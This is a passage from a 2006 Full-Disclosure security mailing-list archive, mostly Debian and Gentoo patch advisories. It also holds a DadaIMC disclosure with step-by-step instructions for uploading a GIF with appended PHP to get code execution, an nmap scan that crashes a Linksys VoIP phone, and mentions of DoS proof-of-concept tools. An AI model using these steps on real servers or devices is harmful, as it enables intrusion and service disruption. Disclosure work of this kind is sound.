http://security.debian.org/pool/updates/main/c/clamav/clamav_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 64428 fc678da4d6ff9a60f1d0118857025c34 http://security.debian.org/pool/updates/main/c/clamav/clamav-daemon_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 39472 59309047f49d149d61dcaa64a7c1d261 http://security.debian.org/pool/updates/main/c/clamav/clamav-freshclam_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 2171188 793f229374c70ed9f945effccaf4e18e http://security.debian.org/pool/updates/main/c/clamav/clamav-milter_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 36854 24fa5876984aa5e633781edf408dcda1 http://security.debian.org/pool/updates/main/c/clamav/libclamav-dev_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 175978 2fb86e8253a0f9a3da3bf1101f70168e http://security.debian.org/pool/updates/main/c/clamav/libclamav1_0.84-2.sarge.12_sparc.deb Size/MD5 checksum: 265034 2a31297ba3c110c4398c1dd09377e24e These files will probably be moved into the stable distribution on its next update. - --------------------------------------------------------------------------------- For apt-get: deb http://security.debian.org/ stable/updates main For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main Mailing list: debian-security-announce at lists.debian.org Package info: `apt-cache show ' and http://packages.debian.org/ -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (GNU/Linux) iD8DBQFFestkXm3vHE4uyloRAlieAJwMPkhURmgTDL437xbZKrxbOk8ibQCfZZJk 1FPy2XOJl4QKiCbYanQgjUI= =GNUX -----END PGP SIGNATURE----- From mayhem at recursiva.org Sat Dec 9 14:47:07 2006 From: mayhem at recursiva.org (Alessio L.R. Pennasilico) Date: Sat, 09 Dec 2006 15:47:07 +0100 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> References: <20061208163235.15537.qmail@web58915.mail.re1.yahoo.com> Message-ID: <1165675628.25743.8.camel@coniglio.recursiva.org> On Fri, 2006-12-08 at 08:32 -0800, Thomas Holt wrote: > Greetings, > My name is Tom Holt, and I am an Assistant Professor at the University > of North Carolina at Charlotte. I am currently conducting a study of > hackers and hacking and am seeking interested men and women who may be > willing to participate. The purpose of this research is to understand > the ways that people become interested in computers and hacking, their > motives for hacking, and how they apply their skills in different > settings. This study will also consider individuals? conceptions of > hacking and experiences in hacker culture. i can suggest you to look at http://hpp.recursiva.org/ to understand if we can collaborate with each other ... a no music in this room mayhem -- Let's pick up the pace, make the parties longer, and the skirt shorter. Let's all go to hell in a fast car and keep it hot! https://www.recursiva.org - Key on pgp.mit.edu ID B88FE057 -------------- next part -------------- A non-text attachment was scrubbed... Name: smime.p7s Type: application/x-pkcs7-signature Size: 3239 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/625980c9/attachment.bin From lwang at lwang.org Sat Dec 9 15:14:25 2006 From: lwang at lwang.org (Louis Wang) Date: Sat, 9 Dec 2006 23:14:25 +0800 Subject: [Full-disclosure] Google pageranked 4 doamin on sale... In-Reply-To: References: <21ae1b060612080550x24e0ed4fg4dc2340e7b02b67e@mail.gmail.com> <21ae1b060612081602n5b3e368ha0f47ce6f8662908@mail.gmail.com> Message-ID: <21ae1b060612090714s7bb750e2vd405cc5adb987a85@mail.gmail.com> That's ok...... 2006/12/9, Dude VanWinkle : > whoops! > > 0Crap, I guess pagerank isnt based on content as I thought it was.. > http://www.webworkshop.net/pagerank.html > > sorry bout that. > > So, correct me if I am wrong, but according to pagerank: if you have a > reciprocal link with microsoft.com about patches, this increases your > rank and because of that, your page about platypuses on the same > site would get higher listings in the search results accordingly. > > I am totally off base with that one. > > -JP > -- Regards, Bill Louis. From matthew.flaschen at gatech.edu Sat Dec 9 16:01:50 2006 From: matthew.flaschen at gatech.edu (Matthew Flaschen) Date: Sat, 09 Dec 2006 11:01:50 -0500 Subject: [Full-disclosure] Call For Participants For A Research Study Of Hacker Culture In-Reply-To: <9A11C528-EE5F-421B-B10E-239E873D9E7C@gmail.com> References: <9A11C528-EE5F-421B-B10E-239E873D9E7C@gmail.com> Message-ID: <457ADDEE.9080603@gatech.edu> Andrew Farmer wrote: > On 08 Dec 06, at 12:47, Evan Stawnyczy wrote: > ^^^^^^^^^ >> My name is Evan ($LastNameNotDisclosed$). > > Nice job with the last-name-non-disclosure. Nice crack! ;) Matt -------------- next part -------------- A non-text attachment was scrubbed... Name: signature.asc Type: application/pgp-signature Size: 250 bytes Desc: OpenPGP digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/ddd4188c/attachment.bin From joxeankoret at yahoo.es Sat Dec 9 21:07:39 2006 From: joxeankoret at yahoo.es (Joxean Koret) Date: Sat, 09 Dec 2006 22:07:39 +0100 Subject: [Full-disclosure] PostgreSQL and Informix Function Fuzzing Tool Message-ID: <1165698459.24201.3.camel@localhost.localdomain> Hi to all! After the Oracle PL/SQL fuzzing tool I decided to write the same for PostgreSQL and Informix. Attached goes the 2 function/stored procedure fuzzers I wrote. The unique "interesting" thinks I found were in PostgreSQL but, as the PostgreSQL Team say, "they are more annoyances than something else". Anyway, attached goes POCs for PostgreSQL which makes postmaster service consume 100% CPU resources and the tools. --- Joxean Koret -------------- next part -------------- A non-text attachment was scrubbed... Name: informix.py Type: text/x-python Size: 4055 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment.py -------------- next part -------------- A non-text attachment was scrubbed... Name: postgresql.py Type: text/x-python Size: 4457 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment-0001.py -------------- next part -------------- A non-text attachment was scrubbed... Name: test1.sh Type: application/x-shellscript Size: 262 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: test2.sh Type: application/x-shellscript Size: 254 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment-0001.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: test3.sh Type: application/x-shellscript Size: 250 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment-0002.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: test4.sh Type: application/x-shellscript Size: 218 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment-0003.bin -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Esta parte del mensaje =?ISO-8859-1?Q?est=E1?= firmada digitalmente Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/7ae7c018/attachment-0004.bin From shawnmer at gmail.com Sat Dec 9 21:09:51 2006 From: shawnmer at gmail.com (Shawn Merdinger) Date: Sat, 9 Dec 2006 13:09:51 -0800 Subject: [Full-disclosure] Linksys WIP 330 VoIP wireless phone crash from Nmap scan In-Reply-To: <1165660385.10738.42.camel@panic> References: <1165660385.10738.42.camel@panic> Message-ID: Hi, Yup, if one has the phone and cares to give free vendor QA that's a tactic to consider. As you know, determining the *exact* cause of the crash can be a tricky thing. For instance, the Milw0rm SYN flood exploit that targeted port 80 on the Cisco 7940 seemed to hose the web server, which then then crashed the phone -- but it was actually a lower-level stack issue. http://www.cisco.com/warp/public/707/cisco-response-20060113-ip-phones.shtml Also, since we're talking about a VoIP device here, getting into some of the more opensource VOIP-specific tools available can also be tricky determining the root-cause, especially from different manners of tool runs and packet sequences. For example, from the the Asteroid SIP DoS tool README at http://infiltrated.net/asteroid/asteroidv1.tar.gz Anyhow, I have found that by sending a certain sequence of these packets, in a certain order, servers react differently. Sometimes it will crash faster, sometimes more extensions are subscribe, etc, etc. I will not post any sequencing until vendors have patched their programs against this lame attack but, I will release the packet samples I've been working with. Thanks, --scm On 12/9/06, Collin R. Mulliner wrote: > what about doing some investigation? Like figuring out which protocol > and port the crash relates to. Then send some "random" stuff to that > port and see what happens. You could find some real interesting stuff... > > see http://www.mulliner.org/pocketpc/ > > Collin > > On Wed, 2006-12-06 at 10:40 -0800, Shawn Merdinger wrote: > > Vulnerability Description > > ================== > > The Linksys WIP 330 VoIP wireless phone will crash when a full > > port-range Nmap scan is run against its IP address. > > > > > > Linksys WIP 330 Firmware Version > > ========================== > > 1.00.06A > > > > > > Nmap scan command > > ================ > > nmap -P0 -p 1-65535 > > > > > > Impact > > ===== > > The crash is only after Nmap has finished. The Nmap scan also seems to > > disrupt updating of the display as the clock is not updated. The crash > > appears related to PhoneCtl.exe running on the phone's Windows CE 4.2 > > operating system. > > > > Screenshot of the crash: http://www.flickr.com/photos/metalmijn/295348294/ > > > > > > Credit > > ==== > > Credit for discovering this vulnerability goes to Armijn Hemel > > > > _______________________________________________ > > Full-Disclosure - We believe in it. > > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > > Hosted and sponsored by Secunia - http://secunia.com/ > -- > Collin R. Mulliner > BETAVERSiON Systems [www.betaversion.net] > info/pgp: finger collin at betaversion.net > USS Enterprise Bumperstricker: Our other starship separates into 3 > pieces! > > From discordian at gmail.com Sun Dec 10 05:39:02 2006 From: discordian at gmail.com (Hagbard Celine) Date: Sat, 9 Dec 2006 23:39:02 -0600 Subject: [Full-disclosure] DadaIMC default configuration vulnerability Message-ID: The instructions for installing Dada into a shared environment lists the following .htaccess file: (http://www.dadaimc.org/mod/documentation/display/4/index.php) ForceType application/x-httpd-php The problem is that the regular expression in FilesMatch allows any uploaded files with the words feature|editor|newswire|otherpress|admin|pbook|media|mod in the name to be executed as php code provided they can be passed through the mime filter. Example: ~$ wget -O http://www.google.com/intl/en_ALL/images/logo.gif [^] :~$ wget -O feature.gif http://www.google.com/intl/en_ALL/images/logo.gif --14:14:11-- http://www.google.com/intl/en_ALL/images/logo.gif [^] => `feature.gif' Resolving www.google.com... 216.239.37.99, 216.239.37.104 Connecting to www.google.com|216.239.37.99|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 8,558 (8.4K) [image/gif] 100%[===============================================================================================================>] 8,558 --.--K/s 14:14:11 (200.27 KB/s) - `feature.gif' saved [8558/8558] :~$ echo "" >> feature.gif create a new article and upload feature.gif as a media file. Right click on the google logo after submitting the article, click copy image location, paste into new window. Scroll down to see phpinfo() output. To Fix, upgrade to software where the author has a clue about security. Until you can manage that, a temporary fix would be to change the .htaccess file to read: or use the location directive in httpd.conf instead. http://bugs.dadaimc.org/view.php?id=191 -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061209/d9c0cfa2/attachment.html From falco at gentoo.org Sun Dec 10 13:31:37 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 14:31:37 +0100 Subject: [Full-disclosure] [ GLSA 200612-03 ] GnuPG: Multiple vulnerabilities Message-ID: <20061210133137.GA16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: GnuPG: Multiple vulnerabilities Date: December 10, 2006 Bugs: #156476, #156947 ID: 200612-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== GnuPG is vulnerable to a buffer overflow and an erroneous function pointer dereference that can result in the execution of arbitrary code. Background ========== The GNU Privacy Guard, GnuPG, is a free replacement for the PGP suite of cryptographic software. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-crypt/gnupg < 1.4.6 >= 1.4.6 Description =========== Hugh Warrington has reported a boundary error in GnuPG, in the "ask_outfile_name()" function from openfile.c: the make_printable_string() function could return a string longer than expected. Additionally, Tavis Ormandy of the Gentoo Security Team reported a design error in which a function pointer can be incorrectly dereferenced. Impact ====== A remote attacker could entice a user to interactively use GnuPG on a crafted file and trigger the boundary error, which will result in a buffer overflow. They could also entice a user to process a signed or encrypted file with gpg or gpgv, possibly called through another application like a mail client, to trigger the dereference error. Both of these vulnerabilities would result in the execution of arbitrary code with the permissions of the user running GnuPG. gpg-agent, gpgsm and other tools are not affected. Workaround ========== There is no known workaround at this time. Resolution ========== All GnuPG users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-crypt/gnupg-1.4.6" References ========== [ 1 ] CVE-2006-6169 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6169 [ 2 ] CVE-2006-6235 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6235 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/cf86b8dd/attachment.bin From falco at gentoo.org Sun Dec 10 13:33:44 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 14:33:44 +0100 Subject: [Full-disclosure] [ GLSA 200612-04 ] ModPlug: Multiple buffer overflows Message-ID: <20061210133344.GC16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ModPlug: Multiple buffer overflows Date: December 10, 2006 Bugs: #143404 ID: 200612-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== ModPlug contains several boundary errors that could lead to buffer overflows resulting in the possible execution of arbitrary code. Background ========== ModPlug is a library for playing MOD-like music. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 media-libs/libmodplug < 0.8-r1 >= 0.8-r1 Description =========== Luigi Auriemma has reported various boundary errors in load_it.cpp and a boundary error in the "CSoundFile::ReadSample()" function in sndfile.cpp. Impact ====== A remote attacker can entice a user to read crafted modules or ITP files, which may trigger a buffer overflow resulting in the execution of arbitrary code with the privileges of the user running the application. Workaround ========== There is no known workaround at this time. Resolution ========== All ModPlug users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=media-libs/libmodplug-0.8-r1" References ========== [ 1 ] CVE-2006-4192 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4192 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/049ba9d4/attachment.bin From johnc at grok.org.uk Sun Dec 10 13:58:24 2006 From: johnc at grok.org.uk (John Cartwright) Date: Sun, 10 Dec 2006 13:58:24 +0000 Subject: [Full-disclosure] List Charter Message-ID: <20061210135824.GA1764@grok.org.uk> [Full-Disclosure] Mailing List Charter John Cartwright - Introduction & Purpose - This document serves as a charter for the [Full-Disclosure] mailing list hosted at lists.grok.org.uk. The list was created on 9th July 2002 by Len Rose, and is primarily concerned with security issues and their discussion. The list is administered by John Cartwright. The Full-Disclosure list is hosted and sponsored by Secunia. - Subscription Information - Subscription/unsubscription may be performed via the HTTP interface located at http://lists.grok.org.uk/mailman/listinfo/full-disclosure. Alternatively, commands may be emailed to full-disclosure-request at lists.grok.org.uk, send the word 'help' in either the message subject or body for details. - Moderation & Management - The [Full-Disclosure] list is unmoderated. Typically posting will be restricted to members only, however the administrators may choose to accept submissions from non-members based on individual merit and relevance. It is expected that the list will be largely self-policing, however in special circumstances (eg spamming, misappropriation) then offending members may be removed from the list by the management. An archive of postings is available at http://lists.grok.org.uk/pipermail/full-disclosure/. - Acceptable Content - Any information pertaining to vulnerabilities is acceptable, for instance announcement and discussion thereof, exploit techniques and code, related tools and papers, and other useful information. Gratuitous advertisement, product placement, or self-promotion is forbidden. Disagreements, flames, arguments, and off-topic discussion should be taken off-list wherever possible. Humour is acceptable in moderation, providing it is inoffensive. Politics should be avoided at all costs. Members are reminded that due to the open nature of the list, they should use discretion in executing any tools or code distributed via this list. - Posting Guidelines - The primary language of this list is English. Members are expected to maintain a reasonable standard of netiquette when posting to the list. Quoting should not exceed that which is necessary to convey context, this is especially relevant to members subscribed to the digested version of the list. The use of HTML is discouraged, but not forbidden. Signatures will preferably be short and to the point, and those containing 'disclaimers' should be avoided where possible. Attachments may be included if relevant or necessary (e.g. PGP or S/MIME signatures, proof-of-concept code, etc) but must not be active (in the case of a worm, for example) or malicious to the recipient. Vacation messages should be carefully configured to avoid replying to list postings. Offenders will be excluded from the mailing list until the problem is corrected. Members may post to the list by emailing full-disclosure at lists.grok.org.uk. Do not send subscription/ unsubscription mails to this address, use the -request address mentioned above. - Charter Additions/Changes - The list charter will be published at http://lists.grok.org.uk/full-disclosure-charter.html. In addition, the charter will be posted monthly to the list by the management. Alterations will be made after consultation with list members and a concensus has been reached. From jaervosz at gentoo.org Sun Dec 10 15:03:12 2006 From: jaervosz at gentoo.org (Sune Kloppenborg Jeppesen) Date: Sun, 10 Dec 2006 16:03:12 +0100 Subject: [Full-disclosure] [ GLSA 200612-05 ] KOffice shared libraries: Heap corruption Message-ID: <200612101603.17024.jaervosz@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: KOffice shared libraries: Heap corruption Date: December 10, 2006 Bugs: #155914 ID: 200612-05 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== An integer overflow in koffice-libs allows for a Denial of Service and possibly the execution of arbitrary code when viewing malicious PowerPoint files. Background ========== KOffice is an integrated office suite for KDE. koffice-libs is a package containing shared librares used by KOffice programs. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 app-office/koffice-libs < 1.5.0 >= 1.5.0 Description =========== Kees Cook of Ubuntu discovered that 'KLaola::readBigBlockDepot()' in klaola.cc fills 'num_of_bbd_blocks' while reading a .ppt (PowerPoint) file without proper sanitizing, resulting in an integer overflow subsequently overwriting the heap with parts of the file being read. Impact ====== By enticing a user to open a specially crafted PowerPoint file, an attacker could crash the application and possibly execute arbitrary code with the rights of the user running KOffice. Workaround ========== There is no known workaround at this time. Resolution ========== All koffice-libs users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=app-office/koffice-libs-1.5.0" References ========== [ 1 ] CVE-2006-6120 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-6120 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-05.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/051d28c5/attachment.bin From julio at rfdslabs.com.br Sun Dec 10 15:21:26 2006 From: julio at rfdslabs.com.br (Julio Cesar Fort) Date: Sun, 10 Dec 2006 12:21:26 -0300 Subject: [Full-disclosure] DadaIMC default configuration vulnerability Message-ID: As informative, Hagbard Celine is already a nickname of Karl Koch, a famous german hacker dead in 1988 and involved with KGB and international spionage. Julio Cesar Fort Recife, PE, Brazil www.rfdslabs.com.br - computers, sex, human mind, music and more. From falco at gentoo.org Sun Dec 10 18:58:58 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 19:58:58 +0100 Subject: [Full-disclosure] [ GLSA 200612-06 ] Mozilla Thunderbird: Multiple vulnerabilities Message-ID: <20061210185858.GI16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: Mozilla Thunderbird: Multiple vulnerabilities Date: December 10, 2006 Bugs: #154448 ID: 200612-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been identified in Mozilla Thunderbird. Background ========== Mozilla Thunderbird is a popular open-source email client from the Mozilla Project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mozilla-thunderbird < 1.5.0.8 >= 1.5.0.8 2 mozilla-thunderbird-bin < 1.5.0.8 >= 1.5.0.8 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== It has been identified that Mozilla Thunderbird improperly handles Script objects while they are being executed, allowing them to be modified during execution. JavaScript is disabled in Mozilla Thunderbird by default. Mozilla Thunderbird has also been found to be vulnerable to various potential buffer overflows. Lastly, the binary release of Mozilla Thunderbird is vulnerable to a low exponent RSA signature forgery issue because it is bundled with a vulnerable version of NSS. Impact ====== An attacker could entice a user to view a specially crafted email that causes a buffer overflow and again executes arbitrary code or causes a Denial of Service. An attacker could also entice a user to view an email containing specially crafted JavaScript and execute arbitrary code with the rights of the user running Mozilla Thunderbird. It is important to note that JavaScript is off by default in Mozilla Thunderbird, and enabling it is strongly discouraged. It is also possible for an attacker to create SSL/TLS or email certificates that would not be detected as invalid by the binary release of Mozilla Thunderbird, raising the possibility for Man-in-the-Middle attacks. Workaround ========== There is no known workaround at this time. Resolution ========== Users upgrading to the following releases of Mozilla Thunderbird should note that this version of Mozilla Thunderbird has been found to not display certain messages in some cases.

All Mozilla Thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/mozilla-thunderbird-1.5.0.8" All Mozilla Thunderbird binary release users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=mail-client/mozilla-thunderbird-bin-1.5.0.8" References ========== [ 1 ] CVE-2006-5462 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462 [ 2 ] CVE-2006-5463 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463 [ 3 ] CVE-2006-5464 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464 [ 4 ] CVE-2006-5747 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747 [ 5 ] CVE-2006-5748 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748 [ 6 ] Mozilla Thunderbird Email Loss Bug https://bugzilla.mozilla.org/show_bug.cgi?id=360409 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/95cd473e/attachment.bin From falco at gentoo.org Sun Dec 10 19:02:23 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 20:02:23 +0100 Subject: [Full-disclosure] [ GLSA 200612-07 ] Mozilla Firefox: Multiple vulnerabilities Message-ID: <20061210190223.GK16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla Firefox: Multiple vulnerabilities Date: December 10, 2006 Bugs: #154434 ID: 200612-07 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in Mozilla Firefox. Background ========== Mozilla Firefox is a popular open-source web browser from the Mozilla Project. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/mozilla-firefox < 1.5.0.8 >= 1.5.0.8 2 www-client/mozilla-firefox-bin < 1.5.0.8 >= 1.5.0.8 ------------------------------------------------------------------- 2 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== Mozilla Firefox improperly handles Script objects while they are being executed. Mozilla Firefox has also been found to be vulnerable to various possible buffer overflows. Lastly, the binary release of Mozilla Firefox is vulnerable to a low exponent RSA signature forgery issue because it is bundled with a vulnerable version of NSS. Impact ====== An attacker could entice a user to view specially crafted JavaScript and execute arbitrary code with the rights of the user running Mozilla Firefox. An attacker could also entice a user to view a specially crafted web page that causes a buffer overflow and again executes arbitrary code. It is also possible for an attacker to make up SSL/TLS certificates that would not be detected as invalid by the binary release of Mozilla Firefox, raising the possibility for Man-in-the-Middle attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-1.5.0.8" All Mozilla Firefox binary release users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/mozilla-firefox-bin-1.5.0.8" References ========== [ 1 ] CVE-2006-5462 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5462 [ 2 ] CVE-2006-5463 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5463 [ 3 ] CVE-2006-5464 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5464 [ 4 ] CVE-2006-5747 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5747 [ 5 ] CVE-2006-5748 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5748 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200612-07.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2006 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20061210/642b40dd/attachment.bin From falco at gentoo.org Sun Dec 10 19:03:21 2006 From: falco at gentoo.org (Raphael Marichez) Date: Sun, 10 Dec 2006 20:03:21 +0100 Subject: [Full-disclosure] [ GLSA 200612-08 ] SeaMonkey: Multiple vulnerabilities Message-ID: <20061210190321.GM16201@falco.falcal.net> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200612-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: SeaMonkey: Multiple vulnerabilities Date: December 10, 2006 Bugs: #154449 ID: 200612-08 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been identified in the SeaMonkey project. Background ========== The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as 'Mozilla Application Suite'. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/seamonkey < 1.0.6 >= 1.0.6 Description =========== The SeaMonkey project is vulnerable to arbitrary JavaScript bytecode execution and arbitrary code execution. Impact ====== An attacker could entice a user to load malicious JavaScript or a malicious web page with a SeaMonkey application and execute arbitrary code with the rights of the user running those products. It is important to note that in the SeaMonkey email client, JavaScript is disabled by default. Workaround ========== 